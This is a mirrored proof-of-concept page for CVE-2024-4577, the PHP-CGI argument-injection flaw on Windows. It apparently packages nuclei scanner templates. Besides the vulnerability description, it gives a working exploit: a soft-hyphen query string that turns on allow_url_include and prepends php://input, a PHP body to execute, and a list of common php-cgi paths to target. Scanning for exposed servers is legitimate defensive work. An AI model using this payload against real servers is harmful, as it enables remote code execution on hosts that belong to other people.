Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source
Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Description
CVE-2024-4577 nuclei-templates
Readme
# CVE-2024-4577-nuclei

<br/>

Payload:

```
?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
```

```php
<?php phpinfo(); ?>
```

<br/>

Test URL:

```
/unfxu9a.php{{payload}}
/php-cgi/unfxu9a.php{{payload}}

/cgi-bin/php-cgi.exe{{payload}}
/php-cgi/php-cgi.exe{{payload}}
/php-cgi/php.exe{{payload}}
/cgi-bin/php.exe{{payload}}
```


<br/>

![Test](./2024_06_08_11_00_01.png)


<br/>

---

Ref:
- https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html
- https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/
File Snapshot

[4.0K] /data/pocs/7ab0ff6f9ebf78106656d015ddccec9a13b49454 ├── [237K] 2024_06_08_11_00_01.png ├── [1.4K] CVE-2024-4577_2.yaml ├── [2.7K] CVE-2024-4577.yaml └── [ 554] README.md 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →